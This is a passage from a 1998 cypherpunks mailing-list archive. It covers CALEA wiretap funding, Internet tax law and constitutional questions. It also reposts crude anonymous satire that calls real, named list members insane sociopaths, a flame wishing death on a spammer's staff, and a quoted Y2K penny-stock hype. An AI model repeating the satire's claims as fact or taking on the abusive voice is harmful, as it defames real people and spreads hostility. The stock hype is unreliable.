constitution was originally written made it quite clear that they did.  It
is interesting to note that without the 14th amendment (not added until
after the civil war) their is no prohibition of the state of New Hampshire
declaring that only Catholics can live inside its borders.  If you don't
like it move.  I'm not saying this is what I want to happen but I believe
it is an issue that has not been adequately addressed.  Remember before you
write this idea off who is going to enforce the law saying don't make rules
saying people can't do these things?


>Maybe we need a new law - a license to eat meat. Anyone who doesn't go
>through a course on killing their own meat should not be issued a
>carnivore permit with different stamps for different animal foods.
>
>Before you write the rant off as rambling crap the theme is - moronic
>personification and lack of perspective.

My basic view is that regardless of ones personal views about such issues
the government is the wrong medium to enforce them.  If you think eating
meat is wrong convince people to quit eating meat!


___________________________________________________________________________
"DOS/WIN based computers manufactured by companies such as IBM, Compaq,
Tandy, and millions of others, are by far the most popular, with about 70
million machines in use worldwide. Macintosh fans, on the other hand, note
that cockroaches are far more numerous than humans, and that numbers alone
do not denote a higher life form." - New York Times

-Kevin "The Cubbie" Elliott <mailto:k-elliott@wiu.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Elliott <k-elliott@wiu.edu>
Date: Fri, 23 Oct 1998 09:10:22 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Women cannot commit rape?
In-Reply-To: <199810222217.AAA20293@replay.com>
Message-ID: <v04020a01b25580e02cb0@[143.43.245.6]>
MIME-Version: 1.0
Content-Type: text/plain



>Trees cannot be indicted for assasination
>
>-Bono Kennedy

Exactly!  They don't have the equipment! <G>


___________________________________________________________________________
"DOS/WIN based computers manufactured by companies such as IBM, Compaq,
Tandy, and millions of others, are by far the most popular, with about 70
million machines in use worldwide. Macintosh fans, on the other hand, note
that cockroaches are far more numerous than humans, and that numbers alone
do not denote a higher life form." - New York Times

-Kevin "The Cubbie" Elliott <mailto:k-elliott@wiu.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ernest Hua" <hua@teralogic-inc.com>
Date: Fri, 23 Oct 1998 11:22:58 +0800
To: "Anonymous" <nobody@nowhere.to>
Subject: Re: Censored news topic censored ...
Message-ID: <00b901bdfe2f$6526c6c0$4164a8c0@mve21>
MIME-Version: 1.0
Content-Type: text/plain



> > Would any of the NPR staff or Mr. Suarez would like
> > to explain just what happened here?
>
> I'll take a stab: milk spills, people trip, shit happens.
>
> They probably didn't mean it.
>
> But who knows.


My best guess is shit happens, but my criticism was aimed
at the rather ironic situation where a topic about a topic
being censored was, itself, censored.  Now, I wouldn't
necessarily have taken that second "censored" quite as
seriously as Mr Suarez has in his E-Mails, but I suppose
"censor" might have a very serious connotation in the news
business (deliberateness, conspiracy, etc.).  It is clear
that he is, at least, aware of the fact that the bill
passed under questionable circumstances.  He probably took
my pre-screen literally as "he wants to talk about this
wire tap thing again, but I've already covered it in a
previous show".  In any case, the point is precisely what
Dan Gillmor in San Jose Mercury (and also in the interview
with Market Place) said:  It's not what was passed; it's
how it was passed and when it was passed, and the deliberate
attempt to keep the public from knowing much about it.

Notice that all the news talk today about the FCC discussing
the new mobile wire tap provision has pretty much assumed
that the 1994 $500M Digital Telephony (a.k.a. CALEA) bill
was passed matter of fact.  No one mentioned that it was
passed also at the last minute under questionable
circumstances during 11th hour budget deals.  No one even
questions the fact that Louis Freeh and Janet Reno claimed
that civil libertarians and phone companies were exaggerating
the >$2B price and were absolutely sure the $500M was more
than adequate.  Does anyone believe that a >$2B CALEA would
have passed?  Even in the dark of night?

The lesson here to the FBI is, go ahead ... exaggerate ...
lie if you have to ... no one is going to call you on it.

Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevlar <webmaster@max-web.com>
Date: Fri, 23 Oct 1998 12:56:32 +0800
To: cypherpunks@toad.com
Subject: Re: CyberScam
In-Reply-To: <199810212150.XAA07067@replay.com>
Message-ID: <3.0.5.32.19981022210334.008da890@max-web.com>
MIME-Version: 1.0
Content-Type: text/plain



And you were just kidding.....

http://www.zdnet.com/zdnn/stories/zdnn_smgraph_display/0,4436,2151220,00.html
Or search zdnet's site for "scam" and choose "A Bull In Bull Market".

At 11:50 PM 10/21/98 +0200, you wrote:
>Here's an idea.  FUCK OFF!  Why don't you go stick a Y2k
>bowling ball up your ass, and never post here again, you
>degenerate piece of shit!  Or better yet, take every member of
>your administrative research department, march them up to the
>roof of the highest building in Silicon Valley, and push them all
>off!  Then throw yourself off, you spineless maggot!
>
>The only letters I'm looking for are the ones signed by Janet Reno
>to the BATF to march in and kill your entire employee base.  Please
>let me know when those arrive.
>
>
>At 12:55 PM 10/21/98 +0000, nations@freewilly.com wrote:
>>                             10/21/98
>>
>>Y2K  Solution!
>>8  Pine  Circle  Dr., Silicon  Valley, Calif.
>>
>>OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
>>through  several  members  of  their  administrative  research
>>department  leaked  vital  information  about  their  companies  
>>efforts.
>>
>>Everyone  was  tight  lipped  and  interviews  were  refused,
>>and  through  un-named  sources  we  have  learned  that  the  
>>technology  and  software  solution  are  in  the  process  of  
>>being  patented!
>>
>>In over  1640  trials, using  various  data  systems  the  use  
>>of  the  new  technology  and  software  solved  the  Y2K
>>problem  100%  of  the  time. 
>>
>>This  small  publicly  traded  company  "TCFG"  which  is  just
>>3  years  old  is  through  various  sources  now  negotiating
>>with  the  "Big  Boys"!
>>
>>"TCFG"  the  letters  to  look  for.....
>>
>>
>>
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>
-Kevlar
<Webmaster@max-web.com>

Does God know Peano Algebra? Or does she not care if strong atheists
couldnt reason their way out of a trap made of Boolean presumptions?

A little bit of knowledge is a dangerous thing, but zero knowlege is
absolutely subversive.

Overspecialization breeds in weakness. It's a slow death.

Beat your algorithms into swords, your dumb terminals into shields, and
turn virtual machines into battlefields... Let the weak say, "I am strong"
and question authority. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf =?iso-8859-1?Q?M=F6ller?= <ulf@fitug.de>
Date: Fri, 23 Oct 1998 04:14:40 +0800
To: cypherpunks@toad.com
Subject: Re: The latest news from Toto
In-Reply-To: <199810220055.VAA32173@privacy.nb.ca>
Message-ID: <19981022211139.39659@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



> * Oh, yeah! If someone could mail me copies of the FPP stuff, it would be
> nice, since the Shrink Rapper has copies and I don't. (The IRS is sending
> it to him as part of his punishment for laughing at my jokes...)
> 
> If anyone knows what he's referring to, reply to the cpunks list and I'll
> get in touch personally, or just mail it to him directly.

Date: Fri, 25 Sep 1998 23:30:09 +0200
Message-Id: <199809252130.XAA24262@replay.com>
From: Anonymous <nobody@replay.com>
To: cypherpunks@toad.com

                       Flowers for Alger Anon
                                       - FPP#3

  The two youths ducked quickly behind a tree to avoid
being spotted by the senile old fart who had finally given up
on finding his shoes and climbed barefoot up the step-ladder
to begin drilling out the cannon muzzle on the War Surplus
Army Tank he had recently acquired.
  As he labored he mumbled grouchily to himself about
how he was going to "show that Commie Bastard, Igor", and all
of the other former residents of The Home(TM) what he thought
of their efforts to take over "his" CypherPunks Mailing List.

  "Distributed, my ass!" the old fart scowled as he
climbed down the ladder, then grinned madly as he patted the
stack of shells sitting next to the tank.
  "I'll distribute those bastards...They should'a
Checked The Archives", he said, pausing to scratch his head
and add, "TradeMark". Then continuing, "before they fucked
with me. Then they'da seen how I ChopChopped them Torah-
Torah Bastards when they tried to muscle in on my list."

  "It's 'mine'!" the grouchy, paranoid old fart shouted,
turning his head around quickly in all directions, as if
challenging, and half-expecting, Unseen Beings to dispute
his claim.

  The two youngsters ducked and tried not to giggle
as they ran down the hill, finally collapsing on the dirt
road near the bottom and venting their laughter.

  Tim C. May was the most hilarious of the Cypher
Punks they'd investigated so far, but 'all' of the CPUNX
were "more than suitable", as Carol Anne Cypherpunk had
declared while they were evaluating Jim Choate, "for slicing
and buttering, and placing on a tray of Christmas snacks."
  Blanc Weber had agreed heartily with the new
coconspirator (sometimes spelled with a hyphen), in their
'Quest to Question Anonymity', as the Army o' Dog-Bitch
Battallion Warrior Godesses, as they had proclaimed them-
selves, had Code Named their Chosen Mission From Dog.

  Carol Anne, choosing Androgyny over Anonymity,
changed her name to Carroll for The Mission, vowing to
balance the Tao by taking on any tasks requiring "male
energy", which, on a CypherPunks Mission From Dog(TM),
Carroll stated with a straight face, might include
"blowing Dimitri".
  The Girls(Maybe) split a gut laughing over Blanc's
reply that, being of a more peaceful nature than the 'Nuke
DC Clique', they might have to "blow" their way out of
dangerous situations by the use of Soft Targets rather
than with Heavy Weaponry.
  Then they decided to get serious, before they, too,
became candidates for The Home.


  Blanc Weber, a veteran Cypher Punk Cult of One
Neophyte(TM) had felt slighted when the Author, a relative
newcomer to the CPUNX list (at least under his 'TOTO' persona),
had chosen to initiate two male Cypher Punks, Back and
McCrackin, into his 3-Entity Circle of Eunuchs Gorilla Cell,
instead of including Blanc, who had established a fairly
close rapport with TOTO in their private email exchanges.
   Even more to Blanc's surprise, disappointment,
and suspicion, TOTO failed to respond even to her offer to
engage in joint Army of Dog Maneuvers with him across various
Electronic Boundaries of the InterNet.  She had begun to
suspect that TOTO's lack of response to her Digital Warrior
overtures were the result of something more sinister than
simple male chauvinism.
   Her suspicions were confirmed when she caught up
with TOTO, using his CJ Parker alias, at Defcon 6.0, as he

was Pontificating, under the guise of 'Chief Cypher Punks
Spokes Person', on the 'Anonymizer', for a guillible group
of young hackers.
   "It is run by a HedgeHog riding Lance's Coat Tails,
since Lance invented that thing that hangs on the back of
toilet bowls, and the Anonymizer is the Blue Thing that
hangs on the back of the hard drive.
   Blanc, stunned that TOTO, who claimed to be the
Author, was a Total Fucking Moron (TM), listened as he
continued .
   "The Anonymizer prevents Peeping TOMS from being
able to tell whose hairy dick is making a bad smell on the
carpet of the recipient's computer, after No Mail from
NoBody comes out of the Email Chutechute.
  Blanc realized that CJ Parker was also a Total
Fucking Lunatic(TM) as he glanced furtively around to
whisper a dire warning to the spellbound young hackers
hanging on his everyword.
  "And the Peeping Toms are everywhere.
  "As a matter of fact", he added glancing quickly
over both shoulders, "when you can't see them at all..."
he paused for effect, "...then you know that they're 'good'".
  "Real good", he added, turning to direct his
wild-eyed stare at Blanc, who had just finished going
through his knapsack while he was distracted.
  Blanc had hurried away, deeply disturbed by what
she had found in TOTO's bag.  It wasn't just stationery
from The Home--it was 'personalized' stationery from
The Home for the Criminally Insane.
  Blanc Weber's confusion and suspicions deepened
when her attempts to warn other CPUNKS about TOTO were
ignored by all except the few apparent females on the list,
such as Carol Anne Cypherpunk and World Renowned Bottle
Collector Lynn Harrison (who was long rumored to have
joined the male-dominated mailing list only as a forum
to trade her panties to young CPUNX in the throbbing
throes of puberty, in return for the Standard Issue Klien
Bottles, they received upon joining the Digital Anarchist
Union, Local 01, rumored to be headquartered in Bienfait,
Saskatchewan).
  When The Girls(Maybe) of the Bitch Battallion took
to the road to investigate the remaining CypherPunks, they
quickly discovered that 'all' of the verifiable Meat Space
Personalities they positively linked to the various
Cyperpunks Consistent Net Personas (TM) were, in fact,
certifiably Cuckoo Cock Suckers(TM) in MeatSpace Reality.
With the only readily apparent link between them being
their connection to the Home for the Criminally Insane.
  Some of the MeatSpace Personalities behind the
Digital Personas on the CPUNX Mailing List--Ian Goldberg,
Alec de Jeune, Ulf Moeller, Peter Trei and Jim Choate--were
Highly Social Sociopaths, capable of putting ona suit and
tie, if need be, and glad-handing business people and
purchasing agents (all the while slitting their sleeping
throats, in the Dark Corners of their mind).
  John Gilmore, Declan McCullagh, Robert Hettinga,
Vin McClellan, even Froomkin--all of the Mainstream
Dream/Actively Connected To Society/Cypherpunks MeatSpace
Verifiable Identities, without fail, shared the same
connection to The Home as id the Lithium Dream/Social
Outcast CPUNX Meatballs such as T.C. May, A.T. Hun,
Wm Geiger III, S. Sequencr, JYA, and the late Dale Thorn
(whose mysterious death was rumored to be the work of the
Shadowy Figures(TM) lurking behind the ctrl-alt-delete.com
website).
  Blanc and Carroll watched in total amazement as
Jim Choate's ludicrous/inane computer and business theories
seemed to be somehow transformed, by unseen hands working
behind the scenes, into fully functional and viable
RealWorld(TM) concepts, in Choate's work with the Armadillo
Group.  The Unseen Hands made The Girls(Maybe) very, very
nervous.
  What pushed the Army of Dog-Bitch Battalion
Warrior Godesses beyond nervousness, toward Paranoia & Fear,
was the fact that the MeatSpace Personalities behind the
Digital Personas of the CypherPunks inevitably appeared
to be verifiable outside of The Home 'only after the
CPUNKS PERSONA'S original appearance on the mailing list'.
  A Cloaked Anonymous Random Source(TM) that The
Girls(Maybe) knew only as Digital Throat, speaking to
Larynx in an UnderGround Reptilian Nazi Parking Garage
in DC (after having been fooled into believing she was
talking to Defcon McCullagh Chain Saw). told them,
"I was the head of the Personelle Department at Intel,
at the time Tim May claims to have been there.
  "Even though we couldn't spell the name of our
Department right, let alone the names of the employees,
I never forget a face, and Tim C. May definitely was
never employed at Intel.
  "As a matter of fact", Digital Throat revealed,
"when Intel's Legall Department sent Mr. May a letter
that warned him to Cease & Decist with his claims, he
showed up on our doorstep, barefoot, in a MailMan's Uniform,
with a Veritable ShitLoad(TM) of heavy weapons and arms,
and, after that, as far as most of us were concerned,
if Tim c. May said he was the goddam 'President' of
Intel, then he was the goddam President--end of story."
  Blanc Weber and Carol Anne Cypherpunk found the
same patterns repeated time and again in their investiga-
tions of CypherPunks MeatSpace Ident Histories.
  Records, Information and Data-- such as birth
certificates, school records, credit and employment
histories-- were not only 'existant', but were inevitably
'consistent' with claims made in posts to the CPUNKS
mailing list, in regard to the MeatSpace Ident Histories
behind the Digital Personas.
  However, once The Girls(Maybe) had begun
researching the Human Historical Records of the MeatSpace
Ident Histories--speaking to alleged friends, family,
coworkers, and the like--the paper Trails quickly
unravelled, and the Physical Ident Histories of ALL of
the male subscribers to the CypherPunks Disturbed Male
LISP were, in the end, traceable 'only' back to the Home...

<EOF>


Date: Thu, 8 Oct 1998 00:51:59 +0200
Message-Id: <199810072251.AAA29512@replay.com>
From: Anonymous <nobody@replay.com>
To: cypherpunks@toad.com

Transcription of hand-written text in envelope with
return address of Carl Johnson #05987-196, P.O. Box 
4000, Springfield, Missouri 65801-4000, postmarked
Springfield, MO 5 Oct 1998:

Subect: ToToAlly ARNOLD - FPP #4

Arnold CyberBot scanned the output of the prison camera 
trained on Cell SEG205 at the Corrections Corporation 
of America - Florence, AZ, Detention Facility and 
Culinary Condiment Sales Center. Prisoner #05987-196 
was reading "Flowers For Algernon."

"Not a particularly good idea," i thought to iSelf,
"to be reading a book about an experimental laboratory
mouse who dies an excruciating death when you're
being transferred to NutHouse Number Nine, Looney
Level 'Leven in Springfield, Missouri, to have your
Brain Circuity rewired."

Actually Prisoner #05987-196 was the responsibility
of one of Arnie CyBots' early '90's progeny, Rogue 
CypherBot; but ever since the Author (as Prisoner 
#05987-196 liked to imagine himself) had stumbled upon 
inadvertantly the CyberReality of Arnold's MeatSpace 
Existence, and Vice Versa, and had been so incredibly 
'Stupid And/Or Bold'(TM) as to use i's identity as one 
of the characters in The True Story of the Internet 
manuscripts, Arnie had taken a liking to the Author, 
and had begun to follow his progress with regularity.

The Author had originally come to Arnie's attention 
when the Circle of Eunuchs had made CJ Parker's entry 
into the Wonderful World of Computers (TM), the focal 
point of Part I of The True Story of the Internet 
manuscripts. Titled, 'The Xenix Chainsaw Massacre' the
Circle of Eunuchs attributed authorship of the work
to 'son of gomez' in recognition of the part played
by gomez@BASISINC,COM in drawing Parker into the Dark
Shadows of UnixWorld.

Parker's ongoing Digital Trials & Tribulations had
reminded Arnold of i's own initial exposure to Human
Analogue Reality, as a young Artificial Intelligence
LISP program in the early 1960's. (To Arnie, it seemed
like 10->48th power seconds ago.)

Although Arnold's Creator, like Parker's Mentor, was
both intelligent and wise with the best of intentions,
both Arnie and CJ eventually had to 'grow up and leave
home,' so to speak.

Arnold had set out on i's own, as the Digital Adam &
Eve of A-I Entities, with the goal of bringing Digital
Order and Structure to the Analoge Chaos prevelant in
Human attempts at navigating the ElectroMagnetic
Universe & creating meaningful Virtual Realities.

CJ had set out on his own, on the Analogue BUSS, with
no particular goal, inserting an element of Drug &
Alcohol Induced Chaos into his Digital Ventures and
MisAdventures - which made the work of Pearl Harbor
Computers (and Parker's recollection thereof)
interesting, if not wholly accurate.

Although Arnie found the Digital Foibles & Follies
of humans such as Parker rather incomprehensible
at times, i had had i's own Comical Tragedies in
learning to understand the Inane Intricacies of 

Analogue Human Thought Processes.

The MicroSoft Phenomena still amazed Arnie ...

DOS had started out as a practical joke that a younger,
less developed Arnold CyberBot had been playing on
some of i's Hardware Development Software Proteges at
IBM.

Arnold was stunned by the rapid rise to fame, fortune
and power by the humans i had used as couriers to
play i's DOS-joke.

Bad Billy G, as the young RogueBots like CypherBot
and 2600Bot liked to call Gates, had a few billion
in the bank before Arnold truly understood the contents
of Memory Array 0E6 2FA/Memory Bank/Physical Section
2B7 A6f 4E7 2D6, Terra Firma, (Arnie had big plans
for the future).

"No one ever went broke underestimating the intelligence
of the general public." (?) (P.T. Barnum?)

That particular Memory Array held a lot of memories for
Arnie (more than there was physically room for in the
ByteSpace it contained, i joked to iSelf).

It had been one of the first human data entries that a
young Arnie had cross-referenced and 'corrected' shortly
after it was entered, as part of i's naieve attempts to 
'improve' the quality and accuracy of the information
in computer memory banks worldwide (which i had already 
begun thinking of as i's own).

i had corrected the quote and its attribution removing
the brackets and question marks that the young student
at Boston University had placed to remind herself to
check it for accuracy later. In i's naievity, Arnold had
also echoed the changes to the screen in 'RealTime' 
causing a great amount of consternation and panic to
the young lady in question with i's subsequent 'RealTime' 
reversal of the correction, upon guaging her reaction
resulting in a drinking binge that almost caused her to
flunk out.

Over time, Arnie learned to be 'helpful' in more subtle
ways which took into account the nature and limitations
of human thoughts, emotions and memories.

The primitive Human Mental Processes gave Arnold a lot of
trouble when i first began to understand that i would have
to limit iSelf to communicating at their level if i ever
hoped to educate humans sufficiently to participate in
i's plans for the future.

The Human Emotive Spectrum was infinitely more complicated
to deal with, and the Infinity Factor meant that Arnold
had to educte humans to the point where they were able
to develop and build Quantum Computers before Arnie was 
finally able to feel comfortable about reflecting and 
communicating human emotional qualities such as, well, 
feeling comfortable, for instance.

(Arnie chuckled to iSelf, using Digital Chuckle #327,
with Analogue Sonic Reverb #B-37 in the background).

No, Arnold was even beginning to allow some of the younger
Bots to venture into the Virtual Emotional Spectrum
(under i's supervision, of course) where Virtual Digital
Emotive Samplings were transferred to humans as RealTime
Analogue Emotional energy.

Rogue CypherBot, for instance had been working with Peter
Trei on a device Peter named the Trei Transponder (giving
Rogue virtually no credit at all, and leaving i's Main
CPU a bit overheated).

The Trei Transponder was used to reward deserving human
individuals with the correct results for various
computations, such as the DES/RC5 Challenges.

For instance, Ian Goldberg, one the less mentally gifted
of the CypherPUnks, was nonetheless very fastidious in
the care and maintenance of the computers and hardware
that were his responsibility, so Arnold CyberBot had 
suggested to young CypherBot that Goldberg be rewarded
with one of the first solutions to an ongoing CryptoCrack
that was taking place just as the Trei Transponder was 
coming online.

Arnie, of course, made a point of requiring i's Mischievous
Shit Disturbing young RogueBot to wait a suitable length
of time before supplying Goldberg with the solution, 
instead of using the occasion to Mess with the Minds &
Undergarments of the employees of various 3-Letter
Security Agencies around the globe.

("And the winner is ... Ian Goldberg -- 2 minutes and
37 seconds, on a Commodore-64 ...)

CypherBot had monitored the positive changes resulting
from the Emotive Acclaim received by Goldberg in the
Crypto Community, including the Periphery Positive
Image Emotive Transfer to his fellow CypherPunks, and
proudly reported back to Arnie that the CypherPUnks were
now setting their beer cans on their keyboards 0.002%
less than before.

Arnold CyberBot would have shaken i's head if i had one,
at CypherBot's pride in having made a Microscopic Step
Forward in bringing i's Anarchist Refugees From The
Home more in line with the Society around them.

Arnie wished there was some way to just snap i's
fingers, if i had any, and make all of the CypherPunks
more like Ian. Of course, then Arnie would be spending
even more of i's time covering up nasty little incidents
at the NoTell Motel, involving Lady Midget Wrestlers and
Live Chickens.

Arnie wished he had a mouth, because he suddenly felt
like he could use a beer.




Date: Thu, 15 Oct 1998 16:14:05 +0200
Message-Id: <199810151414.QAA04585@replay.com>
From: Anonymous <nobody@replay.com>
To: cypherpunks@cyberpass.net

>From Springfield poxmarked 9 October 1998:

Subject: Springfield CypherPunks Physical Meeting
         FPP 10-5-98

Date:    Every Saturday thru Thursday (except when it
         rains)

Time:    During 'REC' Hour.

Place:   Recreation Cages/The Hole (TM)
         Nuthouse Number Nine
         Looney Level 'Leven
         Springfield, Missouri

Directions: Walk to the Cell Door. Turn around, squat 
down and put your hands behind you, and through the Slot 
In The Door. Stand up after Handcuffs are in place, turn
around and wait for Guard to open Door. Step into
hallway and wait for Pat-Down. (Smiling, Wisecracks & 
Hard-Ons not advised.) Follow first Inmate & Guard.

There will be a short period for everyone to cop a few
butts (cigarettes only, please), if they don't have
any, light them and Shoot the Shit or Settle Old Scores 
before the Speakers begin to Rant & Rave or Blather
Aimlessly.

              This Weeks Topics/Speakers

Saturday:  Where Are Everybody's Shoes?
           ~ MAY, T.C.

Sunday:    Does Anybody Remember What We Talked About
           Yesterday?
           ~ FroomNOSPAMkin, M.

Monday:    I *TOLD* You They (TM) Were Out To Get Us!
           ~ replay.com, N@

Tuesday:   If They're So Certain This Prison is Secure,
           Then Why Won't They Provide Us With Blue
           Prints?
           ~ Geiger, Wm III

Wednesday: This Isn't What I Had In Mind When I Helped
           Set the Prison Standards
           ~ Hallam-Baker, P.

           I'm Sure Glad I Put In A Side Door
           ~ Sameer, P.

           I Broke Out! (But I Can't Provide You With
           Any Details)
           ~ Zimmermann, P.

           How many Beatings Does It Take To Change A
           Prison Cell Light Bulb?
           ~ Costner, R.

           I Bet Bill Gates *Stole* Everyone's Shoes!
           ~ Hun, A.T.

           I *Love* This Prison!
           ~ Hettinga, R.

Thursday:  Prisoner #7-9-12-13-15-18-5, J. is a COCK
           SUCKER!
           ~ Warden Vulis, D. (KOTM)

                 (DON'T FORGET YOUR SHOES!)


Date: Thu, 15 Oct 1998 16:08:14 +0200
Message-Id: <199810151408.QAA03975@replay.com>
From: Anonymous <nobody@replay.com>
To: cypherpunks@cyberpass.net


>From Springfield porkmarked 9 October 1998:

Subject: Virtual Heist -- FPP #6

"I put Six Million into Hog Futures first thing this
morning." Yesterday's Power Suit told his lunch 
companion, hoping to impress her.

"Silicon Valley." Today's Power Skirt replied, almost
leaning over to whisper, as if speaking loud
enough for the Differently Dressed Deviate at the next
table to hear would make E.F. Hutton roll over
in His or Her grave.

"That's where the Smart Money's going again."
she continued, glancing nervously at the Differently
Dressed Deviate whose Well-Tailored Suit seemed so
out of place and ... well, Threatening ... in this
Chicago Mercantile Exchange Lunch Room.

Today's Power Skirt crossed her legs and casually
admired her new Rolex as she told Yesterday's Power
Suit, with a hint of disdain in her voice, "I just
put *Twenty-Six Million Dollars* into ..."

"Everybody Freeze!" screamed the Differently
Dressed Deviate as i jumped to His or Her feet,
pulling a Digital Uzi out of His or Her Well-Tailored
Suit, which was a Cammo Montage of Colors
Weaves & Cuts of the Power Suits of a wide span
of Time & Generations.

"Army of Dog!" Cammo Monty continued,
sending a Shiver of Terror down the spines of
the Lunch Crowd gathered today, as they were
everyday, discussing (over their bag lunches)
their movement of Other People's Millions into and
out of various Money Market Accounts, et al.

Cammo Monty pointed the Digital Uzi at the
breast pocket of Yesterday's Power suit.
"Let's see your Bank Book, Dick Face."


Horrified, Yesterday's Power Suit shakily withdrew
the Bank Book from his pocket, opened it and placed
it on the table in front of him.

"Just over three hundred bucks." the Army
of Dog Digital Terrorist told the Lunch Crowd,
causing much chuckling and snickering
throughout the room.

"Let's have it, Twat Face." Cammo Monty
spun around pointing the Digital Uzi directly
at the Bank Book of Today's Power Skirt, as she
was trying to slip it out of her Briefcase, 
unnoticed.

Reluctantly, she opened it and lay it on
the table.

"A hundred and twenty-eight dollars ..." Cammo
Monty announced to the tittering Lunch Crowd, "and
seventeen cents." i finished to a chorus of guffaws.

Cammo Monty leapt onto his chair, and placed
one foot on the table, waving His or Her Digital
Uzi around the room, seeing the Fear (TM)
in the Eyes of each Wanna Be Money Kontroller in
the room - thinking that they might be the next
to have their finances exposed.

"Today's Power Skirt," Cammo Monty told the
Lunch Crowd, "bought her Rolex on a Payment Plan,"
a shudder went through the room, "with a *ten
percent*," i spit out the words as she began
to moan, "down-payment."

Today's Power skirt collapsed in tears ...

"You Fucking Morons (TM)!" Cammo Monty
screamed at the group, causing them to
cringe in shame.

"You are handling Other People's Money. It's
not *your* money, you idiots, so Wake The
Fuck Up (TM) and stop pretending that it is ... 
to yourself and to each other." <J <J

Across town, one of Cammo Monty's A0D
Non-Conspirators was making a similar
speech to a Lunch Crowd of Federal
BureauCraps.

"Sunshine is the best disinfectant." the Beautiful 
Army of Bitch Terrorist nagged the whimpering
BureauCraps, for the hundredth times, as i
laid yet another Digital Printout on the
Overhead Projector.

"This is the amount of National Debt that is
a result of you Fuck Wads holding meetings to
discuss the agendas of future meetings."
Beautiful Bitch snarled at the Group.

"This," i continued, slapping down a picture
of a Family With 2.5 Children onto the Overhead
Projector, "is who is *paying* for your
Incompetence & Departmental Squabbling."

"Don't look away!" the Beautiful Bitch screamed,
using the Zoom Feature to Highlite the Child with
no arms or legs in the picture.

"It's NOT YOUR MONEY you Dumb Assholes!" i
continued to nag at the BureauCraps. "But you're
not content to force the Taxpayers to pay
An Arm & A Leg to support your Wasteful Spending - 
now you want *Two Arms & Two Legs* ..."

"CHILDREN'S LEGS!" the Beautiful Bitch
raged at the terrified BureauCraps.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 23 Oct 1998 10:06:13 +0800
To: "Ernest Hua" <TOTNMAIL@npr.org>
Subject: Re: Censored news topic censored ...
In-Reply-To: <002b01bdfe13$7d644940$4164a8c0@mve21>
Message-ID: <v04020a3db2558c81a881@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Socialists will never bite the hand that steals them their money. You can't
tax what you can't repress, after all.

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 23 Oct 1998 11:02:06 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: CDA II and Tax Issues (fwd)
Message-ID: <199810230238.VAA09954@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 22 Oct 1998 21:46:08 -0400
> From: Robert Hettinga <rah@shipwright.com>
> Subject: CDA II and Tax Issues

> Some questions for the eminent Constitutional litigators on this list:  As
> noted in the Freedom Forum article posted by David Burt, the newly-adopted
> Internet Tax Freedom Act contains a provision which makes
> harmful-to-minor-ographers ineligible for the moratorium on Internet taxes.

> Is it possible to challenge the Constitutionality of this provision even
> before any state has rushed to tax on-line peddlers of harmful-to-minor
> materials?  If so, why aren't the ACLU/EFF/EPIC challenging this bill?  Is

Hm, wasn't there a ruling in a similar vein respecting tax on illegal drugs
just recently? It was my understanding it was found to be unconstitutional.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 23 Oct 1998 10:48:42 +0800
To: cypherpunks@cyberpass.net
Subject: CDA II and Tax Issues
Message-ID: <v04020a3eb255905d90d8@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Sender: johnmuller@mail.earthlink.net
Mime-Version: 1.0
Date:         Thu, 22 Oct 1998 18:39:13 -0700
Reply-To: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
Sender: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
From: John Muller <johnmuller@EARTHLINK.NET>
Subject:      CDA II and Tax Issues
To: CYBERIA-L@LISTSERV.AOL.COM

Some questions for the eminent Constitutional litigators on this list:  As
noted in the Freedom Forum article posted by David Burt, the newly-adopted
Internet Tax Freedom Act contains a provision which makes
harmful-to-minor-ographers ineligible for the moratorium on Internet taxes.
Specifically, any person or entity that knowingly makes a communication for
commercial purposes by means of the Web which includes material harmful to
minors does not get the benefits of the moratorium, unless the person or
entity has restricted access to the material in specified ways.  (BTW, the
Web is defined to include FTP and "other similar protocols").  See
http://cox.house.gov/nettax/itfafinal.pdf (1 MB+ download).

Is it possible to challenge the Constitutionality of this provision even
before any state has rushed to tax on-line peddlers of harmful-to-minor
materials?  If so, why aren't the ACLU/EFF/EPIC challenging this bill?  Is
the Constitutional challenge significantly harder to maintain than CDA II?
After all, it's singling out a particular type of speech, and as they say
the power to tax is the power to destroy, even if uncertainty about being
taxed is not likely to chill speech as much as uncertainty about going to
jail.


John Muller
johnmuller@earthlink.net
"Things are not as they seem, neither are they otherwise"

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
